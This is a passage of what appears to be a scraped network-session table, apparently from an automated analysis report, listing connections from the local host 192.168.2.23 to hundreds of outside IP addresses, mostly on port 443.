                                        11839192.168.2.235089060.186.77.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11840192.168.2.2354126196.99.97.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11841192.168.2.2343918195.45.207.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11842192.168.2.234613214.210.201.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11843192.168.2.2338148202.71.0.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11844192.168.2.2355184174.243.17.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11845192.168.2.2346816157.84.83.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11846192.168.2.233965051.41.6.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11847192.168.2.233536234.120.234.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11848192.168.2.234605469.88.195.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11849192.168.2.23483401.39.144.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11850192.168.2.2359258106.132.125.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11851192.168.2.2346276158.197.18.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11852192.168.2.2337502146.250.239.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11853192.168.2.235810070.137.154.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11854192.168.2.234005494.167.29.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11855192.168.2.235373449.24.24.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11856192.168.2.2334780145.31.125.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11857192.168.2.23577969.136.159.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11858192.168.2.234334648.234.2.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11859192.168.2.2347792196.224.18.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11860192.168.2.234654062.204.91.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11861192.168.2.2338970129.140.63.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11862192.168.2.2333798109.172.40.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11863192.168.2.2333930211.7.109.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11864192.168.2.234565443.43.109.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11865192.168.2.235486274.30.178.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11866192.168.2.234601265.245.196.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11867192.168.2.2343066211.100.252.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11868192.168.2.2342590137.91.252.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11869192.168.2.2341000169.116.52.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11870192.168.2.234340664.8.21.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11871192.168.2.2360068142.144.221.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11872192.168.2.233756018.54.124.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11873192.168.2.2337530168.56.150.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11874192.168.2.2350206143.111.221.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11875192.168.2.233744423.35.81.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11876192.168.2.2337186108.41.46.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11877192.168.2.2335218110.29.49.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11878192.168.2.235275051.136.244.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11879192.168.2.234500663.6.12.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11880192.168.2.233969683.177.136.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11881192.168.2.235849846.4.157.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11882192.168.2.2353014132.145.98.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11883192.168.2.2353344210.204.114.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11884192.168.2.2357868216.121.62.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11885192.168.2.2348128194.155.201.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11886192.168.2.2358276128.161.115.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11887192.168.2.234508671.143.128.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11888192.168.2.23376944.141.132.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11889192.168.2.2360324181.82.43.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11890192.168.2.2342478160.95.244.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11891192.168.2.235720248.1.205.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11892192.168.2.2360818165.102.64.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11893192.168.2.2346802204.233.126.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11894192.168.2.2338264153.240.91.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11895192.168.2.235058231.231.225.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11896192.168.2.235515254.249.196.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11897192.168.2.235117623.228.108.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11898192.168.2.233338888.142.155.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11899192.168.2.235412249.36.110.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11900192.168.2.2353424111.113.20.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11901192.168.2.2358196222.83.0.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11902192.168.2.2347192105.192.207.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11903192.168.2.2338736162.217.31.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11904192.168.2.234596074.193.181.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11905192.168.2.2355116152.102.92.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11906192.168.2.2354356205.150.178.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11907192.168.2.2357990204.243.164.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11908192.168.2.235237482.118.11.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11909192.168.2.2349878118.245.225.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11910192.168.2.235700635.235.155.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11911192.168.2.233485871.125.26.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11912192.168.2.2342838205.62.176.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11913192.168.2.235309889.35.253.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11914192.168.2.2355054178.177.32.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11915192.168.2.233979024.137.196.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11916192.168.2.2347860155.95.18.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11917192.168.2.2333794108.152.159.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11918192.168.2.2349462101.151.215.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11919192.168.2.2358292151.10.115.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11920192.168.2.235193041.89.92.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11921192.168.2.235410266.247.212.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11922192.168.2.235810482.133.65.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11923192.168.2.234997046.5.10.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11924192.168.2.2353414152.194.186.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11925192.168.2.234575897.98.147.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11926192.168.2.2355100180.172.124.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11927192.168.2.235987649.162.153.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11928192.168.2.2334076113.160.251.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11929192.168.2.235459034.95.77.818080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11930192.168.2.234983291.6.116.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11931192.168.2.2345828130.66.139.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11932192.168.2.233694468.115.34.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11933192.168.2.2359546200.198.232.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11934192.168.2.234313481.237.171.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11935192.168.2.235335073.90.181.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11936192.168.2.2334948178.99.125.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11937192.168.2.2332958187.67.102.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11938192.168.2.2347504212.75.26.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11939192.168.2.2333476223.51.11.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11940192.168.2.2336244100.151.222.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11941192.168.2.2334494211.50.193.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11942192.168.2.235329258.156.46.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11943192.168.2.234977847.191.133.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11944192.168.2.2347064199.91.205.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11945192.168.2.2358352173.211.169.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11946192.168.2.2346262199.197.156.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11947192.168.2.2360676119.77.99.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11948192.168.2.2355872111.217.131.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11949192.168.2.235073450.152.134.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11950192.168.2.2346910208.185.59.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11951192.168.2.2351542185.57.247.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11952192.168.2.235507624.200.219.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11953192.168.2.2341912183.5.251.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11954192.168.2.235914478.192.1.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11955192.168.2.234508476.132.14.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11956192.168.2.2352344193.110.7.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11957192.168.2.2348012149.146.161.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11958192.168.2.233677481.137.141.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11959192.168.2.234032686.16.199.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11960192.168.2.233669672.86.148.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11961192.168.2.2360718143.250.193.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11962192.168.2.235773673.37.223.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11963192.168.2.2336612216.164.69.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11964192.168.2.236019213.219.106.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11965192.168.2.233391624.70.12.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11966192.168.2.234917649.97.227.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11967192.168.2.233992424.94.123.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11968192.168.2.233687878.6.222.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11969192.168.2.23334729.146.44.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11970192.168.2.233604682.94.151.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11971192.168.2.2346370134.230.63.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11972192.168.2.233478818.190.162.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11973192.168.2.235478869.222.167.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11974192.168.2.233532031.250.82.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11975192.168.2.235000839.234.127.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11976192.168.2.2359784123.97.187.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11977192.168.2.235880282.66.140.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11978192.168.2.2356842116.34.65.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11979192.168.2.2348680159.187.9.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11980192.168.2.2336144101.220.174.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11981192.168.2.236095482.138.249.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11982192.168.2.2350050191.99.98.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11983192.168.2.2339980147.135.24.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11984192.168.2.2332806132.80.228.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11985192.168.2.2332944174.249.221.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11986192.168.2.234432895.245.61.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11987192.168.2.2351910103.251.42.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11988192.168.2.2333864169.0.29.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11989192.168.2.2338256220.223.221.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11990192.168.2.2348452156.25.103.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11991192.168.2.235867231.180.124.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11992192.168.2.2348294138.30.71.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11993192.168.2.233427436.110.223.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11994192.168.2.2337526105.109.190.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11995192.168.2.2337368107.104.44.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11996192.168.2.235313886.181.223.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11997192.168.2.233882220.132.147.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11998192.168.2.2358912101.46.252.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11999192.168.2.2341838197.217.74.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12000192.168.2.2355276173.31.67.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12001192.168.2.235735247.184.136.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12002192.168.2.233773061.137.99.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12003192.168.2.2340212140.14.6.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12004192.168.2.233855470.195.80.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12005192.168.2.2347464154.74.18.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12006192.168.2.2337614200.179.177.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12007192.168.2.234777047.237.243.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12008192.168.2.2344776220.174.254.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12009192.168.2.233717035.232.63.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12010192.168.2.2337370161.44.131.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12011192.168.2.233886859.73.90.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12012192.168.2.2360384177.18.255.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12013192.168.2.2337836139.142.89.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12014192.168.2.234545473.26.10.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12015192.168.2.2341570154.16.92.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12016192.168.2.2351034120.28.227.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12017192.168.2.235559042.76.158.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12018192.168.2.2348456148.168.23.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12019192.168.2.2351226140.34.54.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12020192.168.2.235027641.80.14.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12021192.168.2.2356822123.163.167.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12022192.168.2.2358906126.213.202.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12023192.168.2.2347302190.18.118.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12024192.168.2.2360306115.169.126.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12025192.168.2.2343812107.54.152.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12026192.168.2.2360350144.158.249.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12027192.168.2.2340300217.5.51.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12028192.168.2.2334030138.175.19.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12029192.168.2.2341988210.112.1.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12030192.168.2.2334922194.186.204.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12031192.168.2.2349992105.107.16.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12032192.168.2.23587821.126.34.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12033192.168.2.233662037.62.60.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12034192.168.2.2356442196.117.112.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12035192.168.2.234753683.115.81.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12036192.168.2.234626636.189.214.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12037192.168.2.2355896204.29.243.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12038192.168.2.2352074206.49.36.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12039192.168.2.2339854128.37.220.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12040192.168.2.235046483.184.7.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12041192.168.2.2344602124.70.210.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12042192.168.2.234615867.128.23.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12043192.168.2.2336032184.169.95.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12044192.168.2.234209848.226.20.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12045192.168.2.23516004.169.140.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12046192.168.2.2337674113.28.241.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12047192.168.2.2338676117.27.248.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12048192.168.2.2344082184.10.113.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12049192.168.2.2343346169.127.34.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12050192.168.2.234690453.147.62.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12051192.168.2.234743849.173.9.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12052192.168.2.2337212216.168.155.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12053192.168.2.235084893.159.99.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12054192.168.2.2349852105.252.180.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12055192.168.2.235866839.175.117.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12056192.168.2.2354994134.188.213.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12057192.168.2.2344724152.134.104.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12058192.168.2.2353026171.149.29.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12059192.168.2.233465082.69.118.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12060192.168.2.2346320165.180.227.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
